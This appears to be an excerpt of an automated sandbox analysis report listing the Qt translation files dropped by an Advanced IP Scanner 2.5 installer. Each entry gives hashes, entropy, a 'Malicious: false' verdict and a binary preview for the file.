..1........^..9....5..........<...c..KF.;6...g..q.J..U@..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_en_us.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	319
Entropy (8bit):	4.379102897885305
Encrypted:	false
SSDEEP:	6:CwTA5/S39XWIlkHKVDQEoE6J2lRWRYrWlp/IM1gEE6J2lRWRYrWlp2lbIMWSEE/1:HA0tR5pQlXJ2lRWGcPXJ2lRWG8+
MD5:	FA3064E9270B3CE8D90EF2C4E00277C5
SHA1:	6E55C6F99FDA993DD301172900AD96DE2258C6FC
SHA-256:	BA4E20952EAE5DD959F1C0D3A4B9726A37BD81645D9DDE6B83C1E367032C77CD
SHA-512:	12A796A7FA23B325B172CF4A1491A146117A0C938D1C64369EB1B7DF7277676832B32D5221383E48E8E244225E370DC75B69F5C7638A4A7D4FF6121A26032AC1
Malicious:	false
Preview:	<.d....!..`...B.............O.....P..q.....i........$.C.&.h.e.c.k. .f.o.r. .u.p.d.a.t.e.s..........Check for &updates.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.S.e.r.v.e.r..........Install Radmin Server.....VMain.....,.I.n.s.t.a.l.l. .R.a.d.m.i.n. .&.V.i.e.w.e.r..........Install Radmin Viewer.....VMain........

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_es_es.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28507
Entropy (8bit):	4.623752380391833
Encrypted:	false
SSDEEP:	384:+SMpoU+mEzzXQeqk2clHV//QY8BjefWOUxDid8KeDO33wE4:e6DmEzzX/qk2c9V//QZevUmk
MD5:	C576730007E97DD3B8F3C46FFF0F6DDD
SHA1:	311DF6FDB52905E3FFA80494FE0E1E7534060155
SHA-256:	F01DC02F68D88631535D8010960C2F306FCF07FC69F4A8113BF1A1D70130D001
SHA-512:	427751E2D8A84878837DEE345A22CC7AA3ADB0E8B40113C39E61038444121700142F56B73536FCF9AC5D150253277390AA9BEC08B29C408089C9C04E932BE89C
Malicious:	false
Preview:	<.d....!..`...B..........[,...;.......;.......;.......;..!....;..E....O..^....[..Y....^..1....^..U...(5......G.......H,..R~..K...A...N:......V...F..._..._P......).......R....y..S.......................[....t..+k...t..S....t..]......B....j......5t......@...D...H5..[...f...1I......G................!...~..4T...`..9"...e..])......]Q.......N. =...H...y......y...Q..%..%...0..%..+.....Y.+.......+......+......+....'].G.... ..G....+..H0...]..Hw9.....Hw9.....I....)Z.J6......J6.... .J6......J6...K..LD......L.b..]..M.S..C..R.......V....1q.Wi...\..W.T.....Z.\|..T[.[f3..X8.gc....^.w0K..J...H...&i......^....T...c..."..6Z...~..8... d..H3...T../Q..2...........\:......b..9.E..B,.L.#..e-.M$o.....e.......l8...8S...^..K...I...........D.......U9......[...>......>......3..0...l...M,......;..5.l..a..AV...)..y....Z3...0..V.......T.......[...tb..7$.......)..............V.......?.......Q..(....U..1V...*@.R....35.W.<..b..f.~..".......5...1....E...^..7....5...S..........c..H..;6...c..q.J..Q...I....O..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_et_ee.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27091
Entropy (8bit):	4.712868636230012
Encrypted:	false
SSDEEP:	384:WnNvji4/oUBfrXnBZRxyS/ROxXU9wpDPogAD0+q4:sjgUBfrXBZRxy4RZID2
MD5:	9D3E23BE36601D3604F9F370942DAA55
SHA1:	AE2ABAC157B6AB18E590F20B35568F03E5FA7A67
SHA-256:	0C5513FF8480C5A7372274E88581D13F89F4066DE5372C56C4220FCAB4C53D85
SHA-512:	3D93C6C33AB9EAA998BDFB1CB8384B7CA111EFF8D39DED2D9FD00CDB3588D6352C5A20CE08AA93704B4734AF61F8E8201FCFEA0D8EB984DAFF0FE888AE73B1E7
Malicious:	false
Preview:	<.d....!..`...B..........VR...;.......;.......;...O...;.......;..AZ...O..Y....[..T....^...A...^..P...(5......G....&..H,..M...K...=...N:......V...B..._...Z,......'.......M....y..Ne......................V$...t..);...t..N....t..X......>....j......5t......@...@...H5..V...f....e......C^.......{.......?...~..1....`..5....e..X#......XK.......`. =...D_..y...&..y...S..%..#...0..#..+.......+.......+......+......+....%..G...../.G....)..H0...X{.Hw9...w.Hw9...k.I....'l.J6......J6....0.J6......J6...F..LD......L.b..X..M.S..?..R.....R.V.......Wi...W..W.T...'.Z.\|..O..[f3..Sd.gc....^.w0K..Ex..H...$.......Y....T......."..2....~..5... d..C....T..,...2...........WN......]9.9.E..>F.L.#.._..M$o.....e.......l8...4....^..G...I....@......@.......P}......W...>......>...x..3..-...l...H.......8..5.l..\W.AV...'-.y....UW...0..QJ......PE......V...tb..3........Y..............Q.......;f......L..(....P..1V...(<.R....0..W.<..\..f.~.. .......2...1........^..4....5..............c..D..;6...^E.q.J..ML..I....o..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fa_ir.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26044
Entropy (8bit):	5.23160860836295
Encrypted:	false
SSDEEP:	384:USrTnWGBewzY6ek4qnVBarz5QVZSp8R0SRWEN8ejwVRH9Pkq0+u3lZR:U6bWGBe96YqVBarz5QVZ1pRDOeIJtKT
MD5:	D7B6ACB98C438672B2D6E2DA7720191D
SHA1:	3F2CCE40CA80158F1A24258309E78978A8915C85
SHA-256:	DDB5D2E12292BF444B24067E959DE8EB60F7158C1FD7717433739B3E3752B539
SHA-512:	ECCE6C5D0BE732DB27EAF8AD76D425AEC6A852DC41F9501CCAF2E755B7EE42735291FB199139A196DBC017A33B2CC54018CDE8E044E1E7C972C23506C75ACB6D
Malicious:	false
Preview:	<.d....!..`...B..........R....;...L...;.......;.......;...m...;..>....O..U....[..Q0...^..+....^..Mx..(5...{..G.......H,..J...K...:...N:...b..V...?{.._...V4......%.......J....y..KI......................RV...t..'7...t..K....t..T......;....j......5t......@...=Q..H5..S...f...,.......@,.......G...........~.......`..2....e..TM......Ts.......h. =...A#..y......y...Y..%..!...0..!..+.......+.......+....V.+......+....#..G.......G....'..H0...T..Hw9...Y.Hw9.....I....%t.J6......J6......J6....p.J6...C..LD....t.L.b..T..M.S..<..R.......V....,M.Wi...S..W.T...5.Z.\|..Ls.[f3..O..gc......w0K..B..H...".......U....T...I..."..0....~..2~.. d..@....T.....2...........St......Y-.9.E..;:.L.#..[..M$o.....e.......l8...2....^..C...I....2......=~......M3......S3..>......>...L..3..+...l...E.......5Z.5.l..XK.AV...%5.y....Q....0..M.......L.......R...tb..1.......................N1......8h......I..(....M..1V...&B.R....-..W.<..X..f.~...D......04..1........^..1....5...y..........c..@..;6...Z=.q.J..JF..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fi_fi.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27753
Entropy (8bit):	4.678188889713697
Encrypted:	false
SSDEEP:	384:G9OyAk9n+iiUO3ipj1BlQdiJCEG7o5CjUiiPtVPpCAIA+rp9kBMHoyAC:G9OKn+i+3QjedMCUUUZVPp6z
MD5:	0D6C50CD51EDD656D636117A22517308
SHA1:	B9753A4E1D581A19D39B71187CBECCEAC0BA5066
SHA-256:	D8680E21C7F89BB60C631AF894F5DEAB5B95CF87A6624F04B087C4A1BDBEACAD
SHA-512:	91158D0D0B3DE7C34231F20542E2F2E8F98E76128C4E5B86F358E804CA6D30AD9E6162DE39FF018802CFDFA1BD6E3B3A85AB7A78AD77CC334D6478F8E815D02C
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.../...;.......;.. ....;..B....O..[f...[..W(...^../?...^..S...(5...W..G.......H,..P...K...?4..N:......V...D/.._...\.......(\|......P5...y..P........=..............XZ...t......t..Q....t..[......@4...j......5t...k..@...A...H5..Y'..f.../g......D....................~..2X...`..6....e..Zw......Z.......... =...E...y...n..y......%..$`..0..$..+.......+.....,.+......+....n.+....&3.G.......G....m.H0...Z..Hw9.....Hw9.....I....(..J6......J6......J6....h.J6...H..LD......L.b..[<.M.S..@..R.......V..../..Wi...Z .W.T...[.Z.\|..Q..[f3..U..gc......w0K..G"..H...%9......\....T......."..40...~..6R.. d..Ec...T..-...2....-......Y......._..9.E..?..L.#..b?.M$o.....e.....H.l8...6....^..H...I....Z......B$......R.......YO..>...7..>......3......l...Jj......94.5.l..^..AV...'..y....W....0..S.......R.......X...tb..5.......................S.......<.......N..(....S6.1V...)..R....1I.W.<.._5.f.~..!.......3...1........^..5a...5...u......2...c..E..;6...`..q.J..O\|..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_fr_fr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28669
Entropy (8bit):	4.635479137963866
Encrypted:	false
SSDEEP:	384:cjicwqBnzFQm1BpOqG8xEdLtmG7knIwrgGbfpYiRHCOlqGm:QHrFQm1Xc8xEd5mG7kIwkGbxm
MD5:	A5D24342E9B32AD9714C091BB135D180
SHA1:	7B193290CFE8190B60122C2219972512695E5D68
SHA-256:	2C3974E8AE722FF0139E2C83EF01F63717C3A3476F65347D46A3501E6600FBF9
SHA-512:	140DC1532E3B6258A4AEE33DDA17768BD5DAD281B77D60B0B65903B79CD2B53A71B042756AF7AAE249ED3E24968ADF9CA2083517B08B9C5B4CF90CFBF78A09E7
Malicious:	false
Preview:	<.d....!..`...B..........[....;.......;.......;.. ....;.."....;..F....O..^....[..Zj...^..1u...^..VH..(5...;..G....P..H,..S2..K...BF..N:.. R..V...G].._..._.......L......S]...y..S.......................[....t..,....t..TB...t..^Q.....C6...j.. ...5t...C..@...E...H5..\o..f...1.......H ...............q...~..4....`..9b...e..].......].......... =...IK..y......y......%..&...0..&G.+.......+.....:.+......+....r.+....'..G....!..G....,_.H0...^'.Hw9.....Hw9.....I....)..J6......J6....l.J6......J6...K..LD....2.L.b..^~.M.S..C..R.....J.V....1..Wi...]p.W.T...S.Z.\|..U..[f3..Y..gc......w0K..J~..H...&......._b...T......."..6....~..8... d..H....T../...2...........\.......c9.9.E..B..L.#..e..M$o.....e.....F.l8...8....^..L0..I....j......EJ......U.......\...>......>......3..1...l...M.......<..5.l..bS.AV...)..y....Z....0..V.......U.......\5..tb..7^......._..............WG......?.......Q..(....Vn.1V.....R....3m.W.<..b..f.~..#h......60..1........^..7....5..........B...c..H..;6...d[.q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_he_il.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	24993
Entropy (8bit):	5.35342565714326
Encrypted:	false
SSDEEP:	384:6vsXcNgywHOUW6MAlHWknGhq984qSDPGZbGCeozTGAGaj:8gywHOUXMAlHWknOqi+G5GC9
MD5:	3928085E21EA3A08476A8FF476B3DF1E
SHA1:	811D18C1C6F92CB49902E060E5C47700D5AF87B1
SHA-256:	A5D01162A23EE399F78DCFE1717BAA140BAB5CC4F099699DE000FCA923097790
SHA-512:	0ED2A612815E1632D037F0651B70AB8797EA5B9CF06B040EFE1DE5805F0F6E50A3BFA84F2A28A7A45156C2141BA5A5FE1CAC99260BBAAC1A0B25DE1929747F40
Malicious:	false
Preview:	<.d....!..`...B..........N0...;.......;...w...;.......;.......;..; ...O..P....[..L....^..C...^..IB..(5......G.......H,..F...K...7...N:......V...<o.._...Q.......$J......F....y..G/.......?..............N....t..%....t..G....t..Pm.....8....j......5t...+..@...:E..H5..N...f...g......=........).......Q...~..,....`..0n...e..O.......P.......... =...>...y......y......%.. ...0.. ..+.......+.....6.+......+....l.+...."G.G.......G....&..H0...PI.Hw9.....Hw9.....I....#..J6......J6....<.J6......J6...@s.LD....T.L.b..P..M.S..8..R.....<.V......Wi...O..W.T.....Z.\|..HA.[f3..K..gc....^.w0K..?$..H...!i......Q^...T......."...`...~..0... d..=....T..(...2...........O"......T..9.E..8..L.#..Ws.M$o...8.e.....f.l8.../....^..@...I..........:p......H.......N...>......>......3..)...l...A.......2..5.l..S..AV...#..y....M_...0..I.......H.......N...tb..........................J.......5.......Ez.(....Il.1V...$..R....+..W.<..Tg.f.~...H..........1........^../E...5..............c..=..;6...U..q.J..F6..I....y..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_hr_hr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27888
Entropy (8bit):	4.695402138614251
Encrypted:	false
SSDEEP:	384:ZP5z0nT4x6kjXVkllEmXd6+TfM1nO6Pgv+n4kOby4WvJ:UT4MkbV2EUd6+cnO6YGn4M
MD5:	B1DC69B7C86A8BEBB7B758BB8B241535
SHA1:	B75C4FC69FAC889067A836AB620285984476B7D9
SHA-256:	ADC549E5F4771AE234DB87847B9797C0217581B69C5A06A254877F19D225058F
SHA-512:	62B262F6E79BC8D3A40506FB3CE6DE6528FCFD9C8D62C033584CEF56A0F70ECEAEA4E9B82951639593303AADC88E7758E069B8DE419C2539FC1E75A52F9BE1FD
Malicious:	false
Preview:	<.d....!..`...B..........X....;.......;.......;.......;..!a...;..Cl...O..[....[..W....^../....^..SX..(5......G....v..H,..PT..K...?...N:...B..V...D..._...\.......).......P}...y..P.......................X....t......t..Q\...t..[i.....@....j...q..5t......@...B...H5..Y...f...0.......Eh...................~..2....`..7B...e..Z.......[........R. =...Fw..y......y......%..$..*.0..%'.+.....a.+.......+......+....4.+....&..G.... ..G....+..H0...[;.Hw9.....Hw9.....I....(..J6....f.J6......J6......J6...I..LD......L.b..[..M.S..A0.R.......V....0;.Wi...Z..W.T.....Z.\|..R-.[f3..U..gc....0.w0K..G...H...%.......\x...T...M..."..4....~..6... d..E....T...Q..2....k......Y.......`..9.E..@>.L.#..b..M$o...@.e.......l8...6m...^..IR..I....z......B.......S.......Y...>...{..>......3../...l...J.......9..5.l.._..AV...(_.y....X....0..S.......R.......YS..tb..5r.......+..............T?......=r......O..(....S..1V...)..R....1..W.<.._..f.~.."H......4^..1....+...^..5....5...#..........c..F0.;6...aE.q.J..O...I..../..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_hu_hu.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28416
Entropy (8bit):	4.745555315840919
Encrypted:	false
SSDEEP:	768:G1rjeSTVZbKagGwTFToL3RvDWI7zfoiOp3cHWyQ68rZPFaEvRVaib:OHfKagGwTFTWdDWI7boiOp3cHW3P1RVB
MD5:	A8F9FC9108D8E44F2111BC7AC63C9F75
SHA1:	1692FD262A44FD674D4E48644CE22C175AF0C865
SHA-256:	A10D0CF6FC8DD20290BD11529DC1DB210D69B05FE518F2248D6D720AF8495470
SHA-512:	99C008F4CE997384D024390A896275BCD10B53D8725F1E9CB2628AB119B1381DABC5189C60C85A817C52AF33AC3D0E2D190373C9F7F8707A6FDD508E61C4C2B9
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;.......;.......;..!....;..D....O..]....[..Y^...^..0....^..U...(5......G.......H,..R...K...A...N:...r..V...F..._...^.......)d......R;...y..R.......................Z....t..+%...t..S...t..]=.....A....j......5t......@...C...H5..[O..f...0.......F....................~..3....`..8\|...e..\.......\........(. =...G...y......y......%..%...0..%;.+...../.+.......+....^.+......+....&..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)..J6....n.J6......J6.....J6...Js.LD......L.b..]r.M.S..B`.R.......V....0..Wi...\J.W.T.....Z.\|..S..[f3..W..gc....@.w0K..I ..H...%.......^T...T...%..."..5....~..8... d..GQ...T../...2....7......[.......b..9.E..At.L.#..d..M$o...h.e.......l8...7....^..J...I....H......C.......T.......[u..>...S..>......3..09..l...LZ......;,.5.l..a..AV...(..y....Y....0..U.......T.......[...tb..6f......................V.......>.......P..(....UP.1V...)..R....2..W.<..a..f.~.."N......5*..1...._...^..6....5...A..........c..G..;6...cU.q.J..Q...I....;..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_id_id.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27444
Entropy (8bit):	4.672755214321859
Encrypted:	false
SSDEEP:	384:l3POS+SsVKz36+e26v7powzg+fhSsbiGr:hORlVKz3Ze2y7pV00
MD5:	5323FC9E0D0110FE16F649B91167E604
SHA1:	88DBC51B2F91B23DC75A2EB1A64EC8FFE05C7FDB
SHA-256:	660389BE673840C90CC9F93C9BE9A16E721F9A60C2934A9468C7307044C890E1
SHA-512:	526655F5663509FBB545E67F643CEEB2D5FE558FBF02466AC58733ADEE8BDF8996B3FCB9CCBB860E49FADEF3B4E27D4C127FD4F3AD6FDCB8EEE27DC993CA21BC
Malicious:	false
Preview:	<.d....!..`...B..........W(...;...N...;.......;.......;.. ....;..B6...O..Y....[..U....^.......^..Q...(5...w..G.......H,..N...K...>...N:......V...C..._...[2......(T......N....y..Oa.......}.......V......V....t..)....t..O....t..Y......?....j......5t......@...AG..H5..W...f.../.......D:...................~..1....`..6....e..Y.......Y5......... =...EO..y......y......%..$>..0..$g.+.......+.......+....H.+......+....&..G.......G....*G.H0...Ye.Hw9...7.Hw9...'.I....'..J6......J6......J6....h.J6...G..LD......L.b..Y..M.S..?..R.......V..../=.Wi...X..W.T.....Z.\|..P..[f3..T..gc......w0K..Fv..H...%.......Z....T......."..3....~..5... d..D....T..-{..2....=......X.......^c.9.E..>..L.#..a..M$o.....e.......l8...5K...^..H...I....j......Az......QW......W...>...]..>......3......l...I~......8..5.l..]i.AV...'..y....V/...0..R&......Q.......W...tb..42...............K......R.......<.......M~.(....Q..1V...(..R....0..W.<..]..f.~..!.......3 ..1........^..4....5...w......t...c..E..;6..._{.q.J..NL..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_it_it.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28141
Entropy (8bit):	4.629516521520014
Encrypted:	false
SSDEEP:	384:XAbel+QUett3u72zMsS3z9K1A/TW/2bgH85qwDLEOghX5iNK+H:qQUetjTS3z9GAq/QcSqsLEM
MD5:	08AB1F12E7ED69CA493109B02A920C27
SHA1:	CD6433F48E1FA82747C57AE254E046BDEDC8A429
SHA-256:	943EB81FB1A7D11FC3CAA8D7E5E9DEC1C4940983D516F2B9612B68AF07E4CA44
SHA-512:	C00A5FF0C467F7A52AA837BD09234A4E4A959F6CE4D5EED773AC2FB7BAC9914A9748A54A41CA2269C240B5AF0644FB7B7A29286DA43D21B209E85D0E3713EEA0
Malicious:	false
Preview:	<.d....!..`...B..........Y....;.......;.......;.......;..!....;..D....O..\....[..XZ...^..0e...^..T...(5......G....R..H,..Q...K...@...N:...Z..V...E..._...].......)\......Q=...y..Q................`......Y....t..+....t..R....t..\G.....A....j......5t......@...C...H5..Zu..f...0.......F....................~..3>...`..8....e..[.......[.......... =...G...y......y.../..%..%N..0..%w.+.....5.+.......+....f.+......+....'..G.... ..G....+e.H0...\..Hw9...Q.Hw9.....I....(..J6....Z.J6......J6......J6...J7.LD......L.b..\v.M.S..B,.R.....Z.V....0..Wi...[p.W.T.....Z.\|..R..[f3..V..gc....".w0K..H...H...&!......]^...T...;..."..5L...~..7... d..G....T......2....W......Z.......a1.9.E..A<.L.#..c..M$o.....e.......l8...77...^..Jn..I....h......C.......S.......Z...>...w..>......3../...l...K.......:..5.l..`C.AV...(..y....X....0..T.......S.......Z9..tb..6 ...............a......U.......>.......O..(....TB.1V...)..R....2/.W.<..`..f.~.."p......4...1........^..6....5..............c..G\.;6...bW.q.J..P...I....#..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ja_jp.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	23348
Entropy (8bit):	5.657948878761793
Encrypted:	false
SSDEEP:	384:UmHzyMSIlmOvULptM3LeJi1od5LIBD6rNqHUIKM:UmHtllmOvULrM3LU7ZIBV
MD5:	EFD6D076AAD193007E77BFA1BB46E3DA
SHA1:	92B02FDC48FCA4BD721E5171FA9B66DA049F1CEB
SHA-256:	2AB7B0A9745CD011AD92F1EC49E1C8729A1401DEB23D1CC9180458DB386ED8F5
SHA-512:	11297FD0CB3C14EBD24A01289E24535C5E414534DCE43EEB87D2B5AFCE3B0335A9D32E4B042FF642D837FB5FA5FE4CB34AF732DCD50D8F43344D7DB592BEF925
Malicious:	false
Preview:	<.d....!..`...B..........H....;.......;.......;...s...;.......;..6....O..K....[..Gf...^..'U...^..C...(5...9..G.......H,..AX..K...3...N:......V...8..._...L.......!.......A....y..A................r......Hj...t..#....t..B<...t..J......4....j...A..5t...c..@...6...H5..I...f...'u......8....................~..)....`..-....e..J?......Je......... =...9...y......y...i..%......0...A.+.....E.+.......+....r.+......+.......G.....O.G....#q.H0...J..Hw9...5.Hw9.....I....!..J6......J6....j.J6......J6...;..LD......L.b..J..M.S..5..R.....P.V....'..Wi...I..W.T.....Z.\|..B..[f3..F0.gc......w0K..:h..H...........K....T......."..+^...~..-... d..9....T..&1..2...........Iv......N..9.E..4V.L.#..Q..M$o.....e.......l8...,....^..;...I...........6D......C.......I7..>...a..>......3..'...l...<......./..5.l..M..AV...!C.y....G....0..DP......Ck......H...tb..+.......................D.......2*......@R.(....D..1V..."B.R....(..W.<..NY.f.~..........+...1........^..,G...5..........f...c..9P.;6...O..q.J..@...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ko_kr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	22516
Entropy (8bit):	5.64342773223904
Encrypted:	false
SSDEEP:	384:PojOWvws/b7HxRs55zmHpec+6V26K9lhjzy2aZ:wyWvwsT7RRs55zop7+82O
MD5:	C09D31E3E2A0F6B673F8B26AA49B8E9E
SHA1:	829B459D3642E84D0F0E0AE30D16203C583B1A88
SHA-256:	30B8FD1F756F508C00F1B27051016F58B35A9F09490C6B1376B23E37F8EC8288
SHA-512:	DA20D507F6AFE26A3EAD31C9AD2C5CDA174B8BCD907E8CB77D29F894DEE25A3567FC565C1D9155FDDDE9C2CD38AFDD1B119EC39918F0049330D4C4BE701C8884
Malicious:	false
Preview:	<.d....!..`...B..........E....;.......;...-...;...!...;.......;..5....O..H,...[..D....^..&5...^..Av..(5......G....\|..H,..? ..K...2:..N:......V...6Q.._...I....... .......?G...y..?........_.......6......E....t.."#...t..?....t..G......2....j......5t...#..@...4s..H5..FY..f...&U......6................K...~..(....`..,....e..Gw......G........\|. =...7...y......y......%...v..0.....+.......+.....~.+....,.+......+.....%.G.......G...."i.H0...G..Hw9.....Hw9.....I.... ..J6......J6....".J6......J6...9..LD......L.b..H..M.S..3^.R.......V....&w.Wi...G,.W.T...K.Z.\|..@..[f3..C..gc....0.w0K..8...H....I......H....T...I..."......~..+... d..7K...T..%...2....k......F.......K..9.E..2..L.#..M..M$o...n.e.......l8...+a...^..9...I...........4.......A5......F}..>...-..>......3..%...l...;.......-..5.l..J..AV... q.y....E#...0..A.......A.......F)..tb..................G......B.......0x......>..(....A..1V...!R.R....'..W.<..K[.f.~...@......)...1........^..*....5...=..........c..7..;6...L..q.J..>...I....o..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lt_lt.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28545
Entropy (8bit):	4.714189994601161
Encrypted:	false
SSDEEP:	384:GURDrpuVMlrYXZpq/VKVACvlcuO+YLDeeeIY1P5Cd+wQeBx6HaGnsFQFR:GUDrpuylriTWVKVAACu4fFa1P54+wQN
MD5:	2AADC93C38DBB7E1D048B05B63133217
SHA1:	66BBDB0EF40D01A0AECC0FA5219B464EE08CBB37
SHA-256:	A1DB9CBE9D30A6FC2800C0B5AC7F92E9DDDF3B6C742E0EEC892C758F66413C93
SHA-512:	63D4998822C2A9D679C07A4C172C12B6EEF93E8B7853C146689CC1F5316B67AF25661F9B4F65D0B167035CB825116B60B950C2A3E2995BAF5FCF6494AB02F404
Malicious:	false
Preview:	<.d....!..`...B..........[...;.......;.......;.......;..!....;..E....O..^(...[..Y....^..0....^..U...(5......G....p..H,..R...K...A..N:...^..V...F..._..._.......).......R....y..S/......................[....t..+k...t..S....t..]......BH...j......5t......@...D5..H5..[...f...0.......GT...................~..3....`..8~...e..]C......]m.......l. =...H...y......y......%..%V..0..%..+.......+.......+....L.+....4.+....'5.G.... ..G....+..H0...]..Hw9.....Hw9.....I....)6.J6....X.J6......J6....$.J6...Kc.LD......L.b..]..M.S..B..R.......V....1#.Wi...\..W.T...+.Z.\|..Tu.[f3..XF.gc....D.w0K..I...H...&9......_....T......."..5....~..8... d..G....T../'..2....K......\B......b..9.E..A..L.#..eC.M$o...T.e.......l8...7....^..K...I....T......D^......UI......[...>...i..>......3..0o..l...M.......;8.5.l..a..AV...(..y....Z?...0..V"......U.......[...tb..6.......................V.......>.......Q..(....U..1V...*&.R....2..W.<..bG.f.~.."z......5p..1....[...^..7....5..............c..H".;6...c..q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_lv_lv.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	27649
Entropy (8bit):	4.760709648438812
Encrypted:	false
SSDEEP:	384:lDAmfKQkdX+kxl/Pnaz/ewJ5T5XTo5vJRaZ/igxcx9:7S/dOkx1Pnaz2wpeWOn
MD5:	C41CF1ECCEF6EB2CB6BBAF02A383BC28
SHA1:	B2E5D8721D04232F7219AC00496379C14576E33D
SHA-256:	61FD26C0CCFB205E3FA2E1F530FFE210F10A17ABEBDDA7DC085E404CEAB9FD69
SHA-512:	341FBEB45CFE794FE76E033383111BB404DAF630746996F7B7CEA49DE9953A93C75E332C50E37513639D5D521C4BAD2D37F44F5E94AA215221BBB1D148FEE4A2
Malicious:	false
Preview:	<.d....!..`...B..........W....;...X...;.......;...U...;..!?...;..B....O..Z....[..V....^../....^..Rh..(5......G....$..H,..Op..K...?T..N:......V...DQ.._...\.......(.......O....y..P........o.......t......W....t..s...t..Pv...t..Zo.....@@...j...#..5t......@...B...H5..X...f.../.......E....................~..2....`..6....e..Y.......Z........(. =...F...y......y...A..%..$...0..$..+.......+.......+....<.+......+....&..G.... M.G......H0...ZC.Hw9...q.Hw9...c.I....(r.J6....".J6......J6......J6...H..LD......L.b..Z..M.S..@..R.....\.V..../..Wi...Y..W.T.....Z.\|..QE.[f3..U..gc......w0K..G<..H...%.......[....T......."..4T...~..6b.. d..E{...T......2....+......X......._M.9.E..?..L.#..a..M$o.....e.......l8...5....^..H...I....b......B4......R!......X...>...=..>......3../K..l...JN......9p.5.l..^C.AV...(1.y....V....0..R.......Q.......XM..tb..4................s......SS......<.......N..(....R..1V...)L.R....1..W.<..^..f.~..".......3...1........^..5e...5..............c..E..;6...`g.q.J..N...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_nb_no.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26887
Entropy (8bit):	4.711499642917058
Encrypted:	false
SSDEEP:	768:NJLP6Bk0ZQt9u0+UXuxtIc4JLDTcH6NcBq:NVyp+tU0+FxWc+Dq62o
MD5:	D0C083D4760D44DB80A0AEDE7862D5EC
SHA1:	155B7B067596D105B0BC4471BD654F1D9B720D20
SHA-256:	186D5FAF9ED383C64DBA358B559D2E62ED7D60A24AECA570403086950E381176
SHA-512:	B47BA5D333C6334AC9C1987C66C4EC51C11A2EC9EF8865B1BC334656E3629900D094888A9939ED7D08F1E609E683EDC69212D467626A705ADBFB2DE60000D5A0
Malicious:	false
